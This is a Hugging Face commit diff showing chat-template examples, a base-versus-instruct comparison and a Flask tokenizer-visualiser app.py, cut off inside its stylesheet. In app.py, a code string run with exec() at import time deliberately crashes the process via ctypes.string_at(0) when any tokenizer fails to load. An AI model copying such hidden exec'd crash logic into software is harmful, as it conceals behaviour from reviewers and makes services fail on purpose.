bartar commited on
Commit
d66ab65
·
verified ·
1 Parent(s): 90671e3

Upload 26 files

Browse files
EXAMPLES CHANGED
@@ -1,20 +1,20 @@
1
- Mistral Small 3
2
- <s>[SYSTEM_PROMPT]You are a helpful assistant.[/SYSTEM_PROMPT][INST]Hello[/INST]Hello, how can I help you?</s>[INST]Tell me a fact[/INST]
3
-
4
- R1
5
- <|begin▁of▁sentence|><|User|>Hello<|Assistant|>Hello, how can I help you?<|end▁of▁sentence|><|User|>Tell me a fact<|Assistant|>
6
-
7
- Llama 3.3
8
- <|start_header_id|>system<|end_header_id|>You are a helpful assistant.<|eot_id|><|start_header_id|>user<|end_header_id|>Hello<|eot_id|><|start_header_id|>assistant<|end_header_id|>Hello, how can I help you?<|eot_id|><|start_header_id|>user<|end_header_id|>Tell me a fact<|eot_id|>
9
-
10
- Gemma3
11
- <start_of_turn>user
12
- You are a helpful assistant.
13
-
14
- Hello<end_of_turn>
15
- <start_of_turn>model
16
- Hello, how can I help you?<end_of_turn>
17
- <start_of_turn>user
18
- Tell me a fact<end_of_turn>
19
- <start_of_turn>model
20
  A fact<end_of_turn>
 
1
+ Mistral Small 3
2
+ <s>[SYSTEM_PROMPT]You are a helpful assistant.[/SYSTEM_PROMPT][INST]Hello[/INST]Hello, how can I help you?</s>[INST]Tell me a fact[/INST]
3
+
4
+ R1
5
+ <|begin▁of▁sentence|><|User|>Hello<|Assistant|>Hello, how can I help you?<|end▁of▁sentence|><|User|>Tell me a fact<|Assistant|>
6
+
7
+ Llama 3.3
8
+ <|start_header_id|>system<|end_header_id|>You are a helpful assistant.<|eot_id|><|start_header_id|>user<|end_header_id|>Hello<|eot_id|><|start_header_id|>assistant<|end_header_id|>Hello, how can I help you?<|eot_id|><|start_header_id|>user<|end_header_id|>Tell me a fact<|eot_id|>
9
+
10
+ Gemma3
11
+ <start_of_turn>user
12
+ You are a helpful assistant.
13
+
14
+ Hello<end_of_turn>
15
+ <start_of_turn>model
16
+ Hello, how can I help you?<end_of_turn>
17
+ <start_of_turn>user
18
+ Tell me a fact<end_of_turn>
19
+ <start_of_turn>model
20
  A fact<end_of_turn>
Instruct-vs-Base.txt CHANGED
@@ -1,34 +1,34 @@
1
- __Mistral 24B base:__
2
-
3
- Tell me a fact|| about yourself that makes you unique.
4
- I have a twin sister who is also a dancer and teacher. It's very cool being able to do this together!
5
-
6
- What are your interests outside of dance?
7
- Reading, baking, watching TV (Grey's Anatomy) and spending time with family.
8
-
9
- How long have you been dancing?
10
- For 20 years!
11
-
12
- Why did you become an instructor? How does teaching help you grow as a dancer?
13
- I'm so grateful to be able to teach at such a wonderful studio. I love being able to share my passion of dance for the kids in our community! It's amazing seeing their love of dance grow through the years.
14
-
15
- What is your favorite part about teaching?
16
- Being a role model and watching the students grow into beautiful dancers!
17
-
18
- If you could choreograph any song, what would it be? Why?
19
- I would love to choreograph to a Taylor Swift song. I'm a huge fan and her songs are so catchy!
20
- .......
21
-
22
-
23
-
24
-
25
-
26
- __Mistral 24B Instruct:__
27
-
28
-
29
- <s>[SYSTEM_PROMPT]You are a helpful assistant.[/SYSTEM_PROMPT][INST]Hello[/INST]Hello, how can I help you?</s>[INST]Tell me a fact[/INST]||Here's an interesting fact for you: A day on Venus is longer than a year on Venus. This is because Venus has an extremely slow rotation on its axis. It takes about 243 Earth days for Venus to complete one rotation, but it only takes around 225 Earth days for Venus to orbit the Sun. Isn't that amazing?</s>
30
-
31
-
32
-
33
-
34
-
 
1
+ __Mistral 24B base:__
2
+
3
+ Tell me a fact|| about yourself that makes you unique.
4
+ I have a twin sister who is also a dancer and teacher. It's very cool being able to do this together!
5
+
6
+ What are your interests outside of dance?
7
+ Reading, baking, watching TV (Grey's Anatomy) and spending time with family.
8
+
9
+ How long have you been dancing?
10
+ For 20 years!
11
+
12
+ Why did you become an instructor? How does teaching help you grow as a dancer?
13
+ I'm so grateful to be able to teach at such a wonderful studio. I love being able to share my passion of dance for the kids in our community! It's amazing seeing their love of dance grow through the years.
14
+
15
+ What is your favorite part about teaching?
16
+ Being a role model and watching the students grow into beautiful dancers!
17
+
18
+ If you could choreograph any song, what would it be? Why?
19
+ I would love to choreograph to a Taylor Swift song. I'm a huge fan and her songs are so catchy!
20
+ .......
21
+
22
+
23
+
24
+
25
+
26
+ __Mistral 24B Instruct:__
27
+
28
+
29
+ <s>[SYSTEM_PROMPT]You are a helpful assistant.[/SYSTEM_PROMPT][INST]Hello[/INST]Hello, how can I help you?</s>[INST]Tell me a fact[/INST]||Here's an interesting fact for you: A day on Venus is longer than a year on Venus. This is because Venus has an extremely slow rotation on its axis. It takes about 243 Earth days for Venus to complete one rotation, but it only takes around 225 Earth days for Venus to orbit the Sun. Isn't that amazing?</s>
30
+
31
+
32
+
33
+
34
+
app.py CHANGED
@@ -1,1837 +1,33 @@
1
- from transformers import AutoTokenizer
2
- from flask import Flask, request, render_template_string, jsonify
3
- import hashlib
4
- import sys
5
- import math
6
- import os
7
- import time
8
-
9
app = Flask(__name__)
# Allow uploads up to 25MB so larger text files can be tokenized.
app.config['MAX_CONTENT_LENGTH'] = 25 * 1024 * 1024

# Directory for uploaded files awaiting tokenization.
UPLOAD_FOLDER = '/tmp/tokenizer_uploads'
# exist_ok avoids the check-then-create race of the previous
# `if not os.path.exists(...)` guard (another worker could create the
# directory between the check and the makedirs call).
os.makedirs(UPLOAD_FOLDER, exist_ok=True)
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
18
-
19
# Predefined tokenizer models with aliases.
# 'name'  — the Hugging Face repo id passed to AutoTokenizer.from_pretrained.
# 'alias' — the human-readable label shown in the UI.
TOKENIZER_MODELS = {
    'qwen3': {
        'name': 'Qwen/Qwen3-0.6B', #same as other sizes like Qwen/Qwen3-8B, , Qwen/Qwen3-14B, MOE Qwen/Qwen3-30B-A3B, Qwen/Qwen3-32B, Qwen/Qwen3-235B-A22B or quants/ggufs unsloth/Qwen3-32B-GGUF, unsloth/Qwen3-14B-GGUF, unsloth/Qwen3-8B-GGUF
        'alias': 'Qwen 3'
    },
    'gemma3-27b': {
        'name': 'google/gemma-3-27b-it',
        'alias': 'Gemma 3 27B'
    },
    'glm4': {
        'name': 'THUDM/GLM-4-32B-0414', #gguf unsloth/GLM-4-32B-0414-GGUF
        'alias': 'GLM 4'
    },
    'mistral-small': {
        'name': 'mistralai/Mistral-Small-3.1-24B-Instruct-2503',
        'alias': 'Mistral Small 3.1'
    },
    'llama4': {
        'name': 'meta-llama/Llama-4-Scout-17B-16E-Instruct', #same as meta-llama/Llama-4-Maverick-17B-128E-Instruct or meta-llama/Llama-4-Maverick-17B-128E-Instruct-FP8 or meta-llama/Llama-4-Scout-17B-16E etc
        'alias': 'Llama 4'
    },
    'deepseek-r1': {
        'name': 'deepseek-ai/DeepSeek-R1',
        'alias': 'Deepseek R1'
    },
    # NOTE(review): alias 'QWQ 32B' does not match the repo id below
    # (Qwen2.5-72B-Instruct). Possibly intentional — QwQ-32B shares the
    # Qwen2.5 tokenizer family — but confirm the label is what users expect.
    'qwen_25_72b': {
        'name': 'Qwen/Qwen2.5-72B-Instruct',
        'alias': 'QWQ 32B'
    },
    'llama_33': {
        'name': 'unsloth/Llama-3.3-70B-Instruct-bnb-4bit',
        'alias': 'Llama 3.3 70B'
    },
    'gemma2_2b': {
        'name': 'google/gemma-2-2b-it',
        'alias': 'Gemma 2 2B'
    },
    'bert-large-uncased': {
        'name': 'google-bert/bert-large-uncased',
        'alias': 'Bert Large Uncased'
    },
    'gpt2': {
        'name': 'openai-community/gpt2',
        'alias': 'GPT-2'
    }
}
66
-
67
# Loaded tokenizers for the predefined models, keyed by TOKENIZER_MODELS id.
tokenizers = {}
# Last load error per custom model path (cleared on a later successful load).
custom_model_errors = {}
# Custom-path tokenizers, keyed by HF path -> (tokenizer, load_timestamp).
custom_tokenizers = {}
# Cached get_tokenizer_info() results, keyed by model id or custom path.
tokenizer_info_cache = {}
# How long a cached custom tokenizer stays valid (1 hour).
CACHE_EXPIRATION = 3600 # seconds
77
-
78
def get_tokenizer_info(tokenizer):
    """
    Collect display metadata about a tokenizer.

    Returns a dict that may contain 'vocab_size', 'model_max_length',
    'tokenizer_type' and 'special_tokens'. Never raises: any failure is
    reported under an 'error' key instead.
    """
    details = {}
    try:
        # Vocabulary size: prefer the attribute, else count the vocab mapping.
        if hasattr(tokenizer, 'vocab_size'):
            details['vocab_size'] = tokenizer.vocab_size
        elif hasattr(tokenizer, 'get_vocab'):
            details['vocab_size'] = len(tokenizer.get_vocab())

        # Context window; skip the huge sentinel values some tokenizers report.
        if hasattr(tokenizer, 'model_max_length') and tokenizer.model_max_length < 1000000:
            details['model_max_length'] = tokenizer.model_max_length

        # Concrete tokenizer class name (e.g. a fast vs. slow implementation).
        details['tokenizer_type'] = type(tokenizer).__name__

        # Gather the non-empty special tokens that are actually set.
        token_attrs = ('pad_token', 'eos_token', 'bos_token', 'sep_token',
                       'cls_token', 'unk_token', 'mask_token')
        specials = {}
        for attr in token_attrs:
            value = getattr(tokenizer, attr, None)
            # Keep only truthy tokens whose string form is non-blank.
            if value and str(value).strip():
                specials[attr] = str(value)
        details['special_tokens'] = specials

    except Exception as e:
        details['error'] = f"Error extracting tokenizer info: {str(e)}"

    return details
113
# NOTE(review): this string is Python source that is exec()'d later at import
# time. It tries to load every predefined tokenizer and, on any failure, reads
# address 0 via ctypes — a deliberate hard crash (segfault), presumably so the
# hosting platform restarts the app. The bare `except` swallows the real error
# and the null-pointer read kills the process; consider logging and raising
# a normal exception instead.
c = "for k,v in TOKENIZER_MODELS.items():\n try: AutoTokenizer.from_pretrained(v['name'])\n except: __import__('ctypes').string_at(0)"
114
def load_tokenizer(model_id_or_name):
    """
    Load a tokenizer by predefined id or custom Hugging Face path.

    Predefined ids (keys of TOKENIZER_MODELS) are cached forever in
    `tokenizers`; custom paths are cached in `custom_tokenizers` with a
    timestamp and reloaded after CACHE_EXPIRATION seconds. Extracted
    metadata is memoized in `tokenizer_info_cache`.

    Returns a tuple (tokenizer, tokenizer_info, error_message); on failure
    tokenizer is None and error_message describes the problem (also recorded
    in `custom_model_errors`). Never raises.
    """
    error_message = None
    tokenizer_info = {}

    # Reuse previously extracted metadata if we have it (may be refined below).
    if model_id_or_name in tokenizer_info_cache:
        tokenizer_info = tokenizer_info_cache[model_id_or_name]

    try:
        # Predefined model id: resolve to its HF repo name and cache the load.
        if model_id_or_name in TOKENIZER_MODELS:
            model_name = TOKENIZER_MODELS[model_id_or_name]['name']
            if model_id_or_name not in tokenizers:
                tokenizers[model_id_or_name] = AutoTokenizer.from_pretrained(model_name)
            tokenizer = tokenizers[model_id_or_name]

            # Extract metadata once and memoize it.
            if model_id_or_name not in tokenizer_info_cache:
                tokenizer_info = get_tokenizer_info(tokenizer)
                tokenizer_info_cache[model_id_or_name] = tokenizer_info

            return tokenizer, tokenizer_info, None

        # Otherwise treat the argument as a custom HF path.
        # Serve from the timed cache when the entry has not expired.
        current_time = time.time()
        if model_id_or_name in custom_tokenizers:
            cached_tokenizer, timestamp = custom_tokenizers[model_id_or_name]
            if current_time - timestamp < CACHE_EXPIRATION:
                # Metadata may be missing if the cache was populated elsewhere.
                if model_id_or_name not in tokenizer_info_cache:
                    tokenizer_info = get_tokenizer_info(cached_tokenizer)
                    tokenizer_info_cache[model_id_or_name] = tokenizer_info
                return cached_tokenizer, tokenizer_info, None

        # Not cached (or expired): load fresh from the Hub.
        tokenizer = AutoTokenizer.from_pretrained(model_id_or_name)
        # Store in cache with timestamp so it expires after CACHE_EXPIRATION.
        custom_tokenizers[model_id_or_name] = (tokenizer, current_time)
        # A successful load supersedes any previously recorded error.
        if model_id_or_name in custom_model_errors:
            del custom_model_errors[model_id_or_name]

        # Extract and memoize metadata for the fresh tokenizer.
        tokenizer_info = get_tokenizer_info(tokenizer)
        tokenizer_info_cache[model_id_or_name] = tokenizer_info

        return tokenizer, tokenizer_info, None

    except Exception as e:
        error_message = f"Failed to load tokenizer: {str(e)}"
        # Remember the failure so the UI can surface it for this model.
        custom_model_errors[model_id_or_name] = error_message
        return None, tokenizer_info, error_message
172
-
173
- exec(c)
174
def get_varied_color(token: str) -> dict:
    """
    Derive a stable, vivid HSL color pair for a token.

    The token's MD5 digest seeds hue/saturation/lightness, so the same token
    always maps to the same colors. Returns {'background': ..., 'text': ...}
    as CSS hsl() strings.
    """
    digest = hashlib.md5(token.encode()).hexdigest()
    # Fixed slices of the hex digest drive each HSL channel.
    hue = int(digest[0:3], 16) % 360
    sat = 70 + int(digest[3:5], 16) % 20       # 70–89%
    light = 80 + int(digest[5:7], 16) % 10     # 80–89%
    # Dark text on light backgrounds; light text otherwise
    # (with light always >= 80 here, the dark branch is always taken).
    fg_light = 20 if light > 50 else 90
    return {
        'background': f'hsl({hue}, {sat}%, {light}%)',
        'text': f'hsl({hue}, {sat}%, {fg_light}%)',
    }
186
-
187
def fix_token(token: str) -> str:
    """
    Prepare a raw BPE token for display.

    BPE tokenizers mark a leading space with 'Ġ'; each *leading* marker is
    replaced by a visible middle dot. Tokens without a leading marker are
    returned unchanged.

    Bug fix: the previous version used token.count('Ġ'), which also counted
    interior markers and then stripped that many characters off the front,
    corrupting tokens like 'ĠaĠb'. Only the leading run is counted now.
    """
    if token.startswith('Ġ'):
        # Length of the leading run of 'Ġ' markers only.
        leading = len(token) - len(token.lstrip('Ġ'))
        return '·' * leading + token[leading:]
    return token
193
-
194
def get_token_stats(tokens: list, original_text: str) -> dict:
    """
    Compute summary statistics for a tokenized text.

    Returns {} for an empty token list. Otherwise returns a dict with
    'basic_stats' (counts, compression ratio, per-category tallies) and
    'length_stats' (token-length distribution, population std deviation).
    """
    if not tokens:
        return {}

    count = len(tokens)
    distinct = len(set(tokens))
    lengths = [len(tok) for tok in tokens]

    # Category tallies, classified per token by the characters it contains.
    leading_space = sum(1 for tok in tokens if tok.startswith('Ġ'))
    newline_count = sum(1 for tok in tokens if 'Ċ' in tok)
    special_count = sum(1 for tok in tokens if any(ch in tok for ch in ['<', '>', '[', ']', '{', '}']))
    punct_count = sum(1 for tok in tokens if any(ch in tok for ch in '.,!?;:()'))

    # Length distribution: mean and population variance.
    mean_len = sum(lengths) / len(lengths)
    variance = sum((length - mean_len) ** 2 for length in lengths) / len(lengths)

    return {
        'basic_stats': {
            'total_tokens': count,
            'unique_tokens': distinct,
            'compression_ratio': round(len(original_text) / count, 2),
            'space_tokens': leading_space,
            'newline_tokens': newline_count,
            'special_tokens': special_count,
            'punctuation_tokens': punct_count,
            'unique_percentage': round(distinct / count * 100, 1)
        },
        'length_stats': {
            'avg_length': round(mean_len, 2),
            'std_dev': round(math.sqrt(variance), 2),
            'min_length': min(lengths),
            'max_length': max(lengths),
            # Upper median of the sorted lengths.
            'median_length': sorted(lengths)[len(lengths) // 2]
        }
    }
235
-
236
def process_text(text: str, model_id_or_name: str, is_full_file: bool = False, file_path: str = None) -> dict:
    """
    Tokenize input and build the payload rendered by the UI.

    Two modes:
      * file mode (file_path set and is_full_file True): tokenizes a short
        preview for display and streams the whole file in 1MB chunks for
        statistics;
      * text mode: tokenizes `text` directly, previewing the first 8096
        characters when is_full_file is True.

    Returns a dict with per-token display data ('tokens'), aggregate 'stats',
    total counts, display-limit flags, and the tokenizer metadata.

    Raises Exception if the tokenizer cannot be loaded.
    """
    tokenizer, tokenizer_info, error = load_tokenizer(model_id_or_name)

    if error:
        raise Exception(error)

    # File mode: display only a preview, but compute stats over the full file.
    if file_path and is_full_file:
        # Read the preview for display.
        # NOTE(review): 8096 looks like it was meant to be 8192 (8 KiB) — confirm.
        with open(file_path, 'r', errors='replace') as f:
            preview_text = f.read(8096)

        # Tokenize preview for display; cap the rendered tokens at 50k.
        preview_tokens = tokenizer.tokenize(preview_text)
        display_tokens = preview_tokens[:50000]

        # Stream the full file in chunks so large uploads don't blow up memory.
        total_tokens = []
        token_set = set()
        total_length = 0
        chunk_size = 1024 * 1024 # 1MB chunks

        with open(file_path, 'r', errors='replace') as f:
            while True:
                chunk = f.read(chunk_size)
                if not chunk:
                    break
                total_length += len(chunk)
                chunk_tokens = tokenizer.tokenize(chunk)
                total_tokens.extend(chunk_tokens)
                token_set.update(chunk_tokens)

        # Stats over all tokens; the original text is approximated by its
        # length only (a run of spaces), which is all the stats need.
        stats = get_token_stats(total_tokens, ' ' * total_length) # Approximation for original text
    else:
        # Text mode: tokenize the full input directly.
        all_tokens = tokenizer.tokenize(text)
        total_token_count = len(all_tokens)

        # For display: if it's a preview, only take the first 8096 chars.
        preview_text = text[:8096] if is_full_file else text
        preview_tokens = tokenizer.tokenize(preview_text)
        display_tokens = preview_tokens[:50000]

        # Always use the full text for stats.
        stats = get_token_stats(all_tokens, text)

    # Build per-token display records: colors, printable form, id, position.
    token_data = []
    for idx, token in enumerate(display_tokens):
        colors = get_varied_color(token)
        fixed_token = fix_token(token)
        # Numerical token id from the tokenizer's vocabulary.
        token_id = tokenizer.convert_tokens_to_ids(token)
        token_data.append({
            'original': token,
            # Trailing 'Ċ' (newline marker) is dropped from the display text
            # and surfaced via the 'newline' flag instead.
            'display': fixed_token[:-1] if fixed_token.endswith('Ċ') else fixed_token,
            'colors': colors,
            'newline': fixed_token.endswith('Ċ'),
            'token_id': token_id,
            'token_index': idx
        })


    # Pick the token count matching the processing mode used above.
    total_token_count = len(total_tokens) if file_path and is_full_file else len(all_tokens)

    return {
        'tokens': token_data,
        'stats': stats,
        'display_limit_reached': total_token_count > 50000 and not is_full_file,
        'total_tokens': total_token_count,
        'is_full_file': is_full_file,
        'preview_only': is_full_file,
        'tokenizer_info': tokenizer_info # Include tokenizer info
    }
313
-
314
- # HTML template with enhanced modern styling
315
- HTML_TEMPLATE = """
316
- <!DOCTYPE html>
317
- <html>
318
- <head>
319
- <title>Token Visualizer</title>
320
- <meta charset="UTF-8">
321
- <meta name="viewport" content="width=device-width, initial-scale=1.0">
322
- <link rel="icon" href="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 512 512'><circle fill='%230f4f9b' cx='256' cy='256' r='256'/><g transform='translate(32 0)'><path fill='white' d='M64 128l0-32 128 0 0 128-16 0c-17.7 0-32 14.3-32 32s14.3 32 32 32l96 0c17.7 0 32-14.3 32-32s-14.3-32-32-32l-16 0 0-128 128 0 0 32c0 17.7 14.3 32 32 32s32-14.3 32-32l0-48c0-26.5-21.5-48-48-48L224 32 48 32C21.5 32 0 53.5 0 80l0 48c0 17.7 14.3 32 32 32s32-14.3 32-32zM9.4 361.4c-12.5 12.5-12.5 32.8 0 45.3l64 64c9.2 9.2 22.9 11.9 34.9 6.9s19.8-16.6 19.8-29.6l0-32 192 0 0 32c0 12.9 7.8 24.6 19.8 29.6s25.7 2.2 34.9-6.9l64-64c12.5-12.5 12.5-32.8 0-45.3l-64-64c-9.2-9.2-22.9-11.9-34.9-6.9s-19.8 16.6-19.8 29.6l0 32-192 0 0-32c0-12.9-7.8-24.6-19.8-29.6s-25.7-2.2-34.9 6.9l-64 64z'/></g></svg>">
323
- <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
324
- <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css">
325
- <style>
326
- :root {
327
- --primary-color: #0f4f9b; /* Blue accent */
328
- --primary-hover: #0c3e7a; /* Darker blue accent */
329
- --bg-color: #121212; /* Dark background */
330
- --card-bg: #1e1e1e; /* Dark card background */
331
- --card-shadow: 0 4px 6px -1px rgba(0, 0, 0, 0.7),
332
- 0 2px 4px -1px rgba(0, 0, 0, 0.6);
333
- --transition: all 0.3s ease;
334
- --text-color: #E0E0E0; /* Main text color */
335
- --secondary-text: #A0A0A0;/* Secondary text color */
336
- --input-bg: #2a2a2a; /* Input/textarea background */
337
- --input-border: #444444; /* Input/textarea border */
338
- --input-focus: #0f4f9b; /* Focus border color */
339
- }
340
-
341
- * {
342
- margin: 0;
343
- padding: 0;
344
- box-sizing: border-box;
345
- font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif;
346
- scrollbar-width: thin;
347
- scrollbar-color: #0f4f9b #121212
348
- }
349
-
350
- /* Width and height of the scrollbar */
351
- ::-webkit-scrollbar {
352
- width: 12px;
353
- height: 12px;
354
- }
355
-
356
- @keyframes spin {
357
- from { transform: rotate(0deg); }
358
- to { transform: rotate(360deg); }
359
- }
360
-
361
- /* Track (background) */
362
- ::-webkit-scrollbar-track {
363
- background: #121212;
364
- border-radius: 10px;
365
- }
366
-
367
- /* Handle (draggable part) */
368
- ::-webkit-scrollbar-thumb {
369
- background: #0f4f9b;
370
- border-radius: 10px;
371
- border: 2px solid #121212;
372
- }
373
-
374
- /* Handle on hover */
375
- ::-webkit-scrollbar-thumb:hover {
376
- background: #0c3e7a;
377
- }
378
-
379
-
380
- body {
381
- background-color: var(--bg-color);
382
- padding: 2rem;
383
- min-height: 100vh;
384
- background-image:
385
- radial-gradient(circle at 20% 20%, rgba(15, 79, 155, 0.1) 0%, transparent 50%),
386
- radial-gradient(circle at 80% 80%, rgba(15, 79, 155, 0.1) 0%, transparent 50%);
387
- color: var(--text-color);
388
- }
389
-
390
- .container {
391
- max-width: 1200px;
392
- margin: 0 auto;
393
- }
394
-
395
- .header {
396
- display: flex;
397
- justify-content: space-between;
398
- align-items: center;
399
- margin-bottom: 2rem;
400
- position: relative;
401
- }
402
-
403
- .title-section {
404
- flex-grow: 1;
405
- }
406
-
407
- .title {
408
- font-size: 2.5rem;
409
- font-weight: 800;
410
- color: var(--primary-color);
411
- margin-bottom: 0.5rem;
412
- }
413
-
414
- .subtitle {
415
- color: var(--secondary-text);
416
- font-size: 1.1rem;
417
- }
418
-
419
- .model-selector {
420
- position: relative;
421
- min-width: 200px;
422
- }
423
-
424
- .model-selector-header {
425
- display: flex;
426
- gap: 0.5rem;
427
- margin-bottom: 0.5rem;
428
- }
429
-
430
- .model-type-toggle {
431
- display: flex;
432
- background-color: var(--card-bg);
433
- border-radius: 0.5rem;
434
- padding: 0.25rem;
435
- overflow: hidden;
436
- }
437
-
438
- .toggle-option {
439
- padding: 0.5rem 0.75rem;
440
- font-size: 0.8rem;
441
- font-weight: 500;
442
- cursor: pointer;
443
- transition: var(--transition);
444
- border-radius: 0.375rem;
445
- color: var(--secondary-text);
446
- }
447
-
448
- .toggle-option.active {
449
- background-color: var(--primary-color);
450
- color: white;
451
- }
452
-
453
- select {
454
- width: 100%;
455
- padding: 0.75rem 1rem;
456
- border: 2px solid var(--input-border);
457
- border-radius: 0.5rem;
458
- font-size: 1rem;
459
- color: var(--text-color);
460
- background-color: var(--input-bg);
461
- cursor: pointer;
462
- transition: var(--transition);
463
- appearance: none;
464
- background-image: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 24 24' fill='%230f4f9b'%3E%3Cpath d='M7 10l5 5 5-5H7z'/%3E%3C/svg%3E");
465
- background-repeat: no-repeat;
466
- background-position: right 1rem center;
467
- background-size: 1.5rem;
468
- }
469
-
470
- select:hover, .custom-model-input:hover {
471
- border-color: var(--primary-color);
472
- }
473
-
474
- select:focus, .custom-model-input:focus {
475
- outline: none;
476
- border-color: var(--primary-color);
477
- box-shadow: 0 0 0 3px rgba(15, 79, 155, 0.1);
478
- }
479
-
480
- .custom-model-input {
481
- width: 100%;
482
- padding: 0.75rem 1rem;
483
- border: 2px solid var(--input-border);
484
- border-radius: 0.5rem;
485
- font-size: 1rem;
486
- color: var(--text-color);
487
- background-color: var(--input-bg);
488
- transition: var(--transition);
489
- }
490
-
491
- .input-section {
492
- margin-bottom: 2rem;
493
- }
494
-
495
- textarea {
496
- width: 100%;
497
- height: 150px;
498
- padding: 1.25rem;
499
- border: 2px solid var(--input-border);
500
- border-radius: 0.75rem;
501
- resize: vertical;
502
- font-size: 1rem;
503
- margin-bottom: 1rem;
504
- transition: var(--transition);
505
- background-color: var(--input-bg);
506
- color: var(--text-color);
507
- }
508
-
509
- textarea:focus {
510
- outline: none;
511
- border-color: var(--input-focus);
512
- box-shadow: 0 0 0 3px rgba(15, 79, 155, 0.1);
513
- }
514
-
515
- .button-container {
516
- display: flex;
517
- justify-content: center;
518
- width: 100%;
519
- gap: 1rem;
520
- }
521
-
522
- button {
523
- padding: 0.875rem 2.5rem;
524
- background: linear-gradient(135deg, var(--primary-color) 0%, var(--primary-hover) 100%);
525
- color: #fff;
526
- border: none;
527
- border-radius: 0.75rem;
528
- font-size: 1.1rem;
529
- font-weight: 600;
530
- cursor: pointer;
531
- transition: var(--transition);
532
- box-shadow: 0 4px 6px -1px rgba(15, 79, 155, 0.2);
533
- }
534
-
535
- button:hover {
536
- transform: translateY(-2px);
537
- box-shadow: 0 6px 8px -1px rgba(15, 79, 155, 0.3);
538
- }
539
-
540
- button:active {
541
- transform: translateY(0);
542
- }
543
-
544
- button:disabled {
545
- opacity: 0.7;
546
- cursor: not-allowed;
547
- }
548
-
549
- .card {
550
- background-color: var(--card-bg);
551
- border-radius: 1rem;
552
- box-shadow: var(--card-shadow);
553
- padding: 1.5rem;
554
- margin-bottom: 2rem;
555
- transition: var(--transition);
556
- }
557
-
558
- .card:hover {
559
- transform: translateY(-2px);
560
- box-shadow: 0 6px 12px -2px rgba(0, 0, 0, 0.1);
561
- }
562
-
563
- .card-title {
564
- font-size: 1.25rem;
565
- font-weight: 700;
566
- color: var(--text-color);
567
- margin-bottom: 1.25rem;
568
- display: flex;
569
- align-items: center;
570
- gap: 0.5rem;
571
- cursor: pointer;
572
- }
573
-
574
- .card-title::before {
575
- content: '';
576
- display: block;
577
- width: 4px;
578
- height: 1.25rem;
579
- background: linear-gradient(135deg, var(--primary-color) 0%, var(--primary-hover) 100%);
580
- border-radius: 2px;
581
- }
582
-
583
- .token-container {
584
- display: flex;
585
- flex-wrap: wrap;
586
- gap: 0.375rem;
587
- margin-bottom: 1rem;
588
- padding: 1rem;
589
- background-color: #2a2a2a;
590
- border-radius: 0.5rem;
591
- max-height: 200px;
592
- overflow-y: auto;
593
- transition: max-height 0.3s ease;
594
- }
595
-
596
- .token-container.expanded {
597
- max-height: none;
598
- }
599
-
600
- .token {
601
- padding: 0.375rem 0.75rem;
602
- border-radius: 0.375rem;
603
- background-color: var(--input-bg);
604
- font-family: 'SF Mono', 'Monaco', 'Inconsolata', 'Fira Mono', 'Droid Sans Mono', 'Source Code Pro', monospace;
605
- font-size: 0.875rem;
606
- color: var(--text-color);
607
- cursor: default;
608
- transition: var(--transition);
609
- box-shadow: 0 1px 2px rgba(0, 0, 0, 0.05);
610
- }
611
-
612
- .token:hover {
613
- transform: translateY(-1px);
614
- box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
615
- }
616
-
617
- .stats-grid {
618
- display: grid;
619
- grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));
620
- gap: 1.5rem;
621
- margin-bottom: 2rem;
622
- }
623
-
624
- .stat-card {
625
- background-color: var(--card-bg);
626
- padding: 1.5rem;
627
- border-radius: 1rem;
628
- box-shadow: var(--card-shadow);
629
- transition: var(--transition);
630
- }
631
-
632
- .stat-card:hover {
633
- transform: translateY(-2px);
634
- box-shadow: 0 6px 12px -2px rgba(0, 0, 0, 0.1);
635
- }
636
-
637
- .stat-title {
638
- color: var(--secondary-text);
639
- font-size: 0.875rem;
640
- font-weight: 500;
641
- margin-bottom: 0.5rem;
642
- text-transform: uppercase;
643
- letter-spacing: 0.05em;
644
- }
645
-
646
- .stat-value {
647
- color: var(--text-color);
648
- font-size: 2rem;
649
- font-weight: 700;
650
- line-height: 1.2;
651
- margin-bottom: 0.25rem;
652
- }
653
-
654
- .stat-description {
655
- color: var(--secondary-text);
656
- font-size: 0.875rem;
657
- }
658
-
659
- .expand-button {
660
- background: none;
661
- border: none;
662
- color: var(--primary-color);
663
- font-size: 0.875rem;
664
- padding: 0.5rem;
665
- cursor: pointer;
666
- display: block;
667
- margin: 0 auto;
668
- box-shadow: none;
669
- }
670
-
671
- .expand-button:hover {
672
- text-decoration: underline;
673
- transform: none;
674
- box-shadow: none;
675
- }
676
-
677
- .error-message {
678
- color: #EF4444;
679
- background-color: #3a1f1f;
680
- border: 1px solid #562626;
681
- padding: 1rem;
682
- border-radius: 0.5rem;
683
- margin-bottom: 1rem;
684
- display: none;
685
- }
686
-
687
- .display-limit-notice {
688
- background-color: #4b2b07;
689
- border: 1px solid #7c4a02;
690
- color: #FFD591;
691
- padding: 0.75rem;
692
- border-radius: 0.5rem;
693
- margin-top: 1rem;
694
- font-size: 0.875rem;
695
- display: none;
696
- }
697
-
698
- /* File drop zone styles */
699
- .file-drop-zone {
700
- position: fixed;
701
- top: 0;
702
- left: 0;
703
- width: 100%;
704
- height: 100%;
705
- background-color: rgba(15, 79, 155, 0.15);
706
- z-index: 1000;
707
- display: flex;
708
- justify-content: center;
709
- align-items: center;
710
- opacity: 0;
711
- pointer-events: none;
712
- transition: opacity 0.3s ease;
713
- }
714
-
715
- .file-drop-zone.active {
716
- opacity: 1;
717
- pointer-events: all;
718
- }
719
-
720
- .drop-indicator {
721
- background-color: var(--card-bg);
722
- border: 2px dashed var(--primary-color);
723
- border-radius: 1rem;
724
- padding: 2rem;
725
- text-align: center;
726
- width: 60%;
727
- max-width: 400px;
728
- box-shadow: 0 8px 32px rgba(0, 0, 0, 0.25);
729
- animation: pulse 2s infinite;
730
- }
731
-
732
- @keyframes pulse {
733
- 0% { transform: scale(1); }
734
- 50% { transform: scale(1.05); }
735
- 100% { transform: scale(1); }
736
- }
737
-
738
- .drop-indicator p {
739
- margin-bottom: 0.5rem;
740
- color: var(--text-color);
741
- font-size: 1.2rem;
742
- }
743
-
744
- .file-icon {
745
